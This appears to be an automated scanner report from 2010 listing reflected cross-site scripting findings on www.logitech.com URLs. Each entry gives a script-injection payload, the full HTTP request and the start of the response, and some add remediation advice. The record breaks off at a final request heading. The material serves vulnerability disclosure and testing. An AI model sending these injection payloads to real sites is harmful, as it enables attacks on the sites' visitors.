This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us6c237"><script>alert(1)</script>d8117e31c41/mice-pointers/mice-keyboard-combos HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:50:31 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 11465</script><script>alert(1)</script>b93d5ffcd34 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /11465</script><script>alert(1)</script>b93d5ffcd34/mice-pointers/mice-keyboard-combos HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:50:36 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c43c9"><script>alert(1)</script>fbbcf14d071 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us/mice-pointersc43c9"><script>alert(1)</script>fbbcf14d071/mice-keyboard-combos HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:50:37 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 28cf0</script><script>alert(1)</script>9576c2e622b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/mice-pointers28cf0</script><script>alert(1)</script>9576c2e622b/mice-keyboard-combos HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:50:42 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 49320</script><script>alert(1)</script>eaef53dc882 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/mice-pointers/mice-keyboard-combos49320</script><script>alert(1)</script>eaef53dc882 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:50:47 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 82bbc"><script>alert(1)</script>857891157c5 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us/mice-pointers/mice-keyboard-combos82bbc"><script>alert(1)</script>857891157c5 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:50:42 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5516d"><script>alert(1)</script>bcaf9da5f4d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /en-us5516d"><script>alert(1)</script>bcaf9da5f4d/mice-pointers/mice/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:00:53 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 97e97</script><script>alert(1)</script>315557cd3e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /97e97</script><script>alert(1)</script>315557cd3e/mice-pointers/mice/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:01:02 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 56b05"><script>alert(1)</script>9890e2c7629 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /en-us/mice-pointers56b05"><script>alert(1)</script>9890e2c7629/mice/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:01:04 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9ce1c</script><script>alert(1)</script>ede519845b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/mice-pointers9ce1c</script><script>alert(1)</script>ede519845b/mice/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:01:11 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5c0a2</script><script>alert(1)</script>84d927f6d8b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/mice-pointers/mice5c0a2</script><script>alert(1)</script>84d927f6d8b/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:01:21 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6acec"><script>alert(1)</script>d7e5722ad58 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /en-us/mice-pointers/mice6acec"><script>alert(1)</script>d7e5722ad58/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:01:15 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fb154</script><script>alert(1)</script>9329c581ffe was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /fb154</script><script>alert(1)</script>9329c581ffe/mice-pointers/mice/devices/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:00:59 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d8128"%3b4fdda16b2b5 was submitted in the REST URL parameter 1. This input was echoed as d8128";4fdda16b2b5 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-usd8128"%3b4fdda16b2b5/mice-pointers/mice/devices/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Server: Apache AK-control: no-store Date: Fri, 12 Nov 2010 13:00:49 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b5558"><script>alert(1)</script>764c0d503dd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /en-usb5558"><script>alert(1)</script>764c0d503dd/mice-pointers/mice/devices/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:00:49 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 374cf</script><script>alert(1)</script>fab1fcb55 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/mice-pointers374cf</script><script>alert(1)</script>fab1fcb55/mice/devices/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:01:08 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 65db7"><script>alert(1)</script>5ef19d53212 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /en-us/mice-pointers65db7"><script>alert(1)</script>5ef19d53212/mice/devices/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:01:02 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7ebfc"><script>alert(1)</script>f214b2cd25c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /en-us/mice-pointers/mice7ebfc"><script>alert(1)</script>f214b2cd25c/devices/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:01:12 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e33e7</script><script>alert(1)</script>ae256bd10da was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/mice-pointers/micee33e7</script><script>alert(1)</script>ae256bd10da/devices/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:01:20 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c0192"><script>alert(1)</script>084a27b3b5b was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /en-us/mice-pointers/mice/devicesc0192"><script>alert(1)</script>084a27b3b5b/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:01:22 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b9aeb</script><script>alert(1)</script>54a92288db7 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/mice-pointers/mice/devicesb9aeb</script><script>alert(1)</script>54a92288db7/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:01:28 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9bb98"%3b6e7415ed227 was submitted in the REST URL parameter 1. This input was echoed as 9bb98";6e7415ed227 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us9bb98"%3b6e7415ed227/mice-pointers/mice/devices/7247 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:56:46 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fc84b</script><script>alert(1)</script>5b291a15fd4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /fc84b</script><script>alert(1)</script>5b291a15fd4/mice-pointers/mice/devices/7247 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:57:02 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a4924"><script>alert(1)</script>049f3eba0cf was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-usa4924"><script>alert(1)</script>049f3eba0cf/mice-pointers/mice/devices/7247 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:56:46 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 81b35</script><script>alert(1)</script>f33a75806cb was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/mice-pointers81b35</script><script>alert(1)</script>f33a75806cb/mice/devices/7247 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:57:14 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ae12d"><script>alert(1)</script>045ef12ab0a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us/mice-pointersae12d"><script>alert(1)</script>045ef12ab0a/mice/devices/7247 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:57:03 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 86960"><script>alert(1)</script>fb364dca366 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
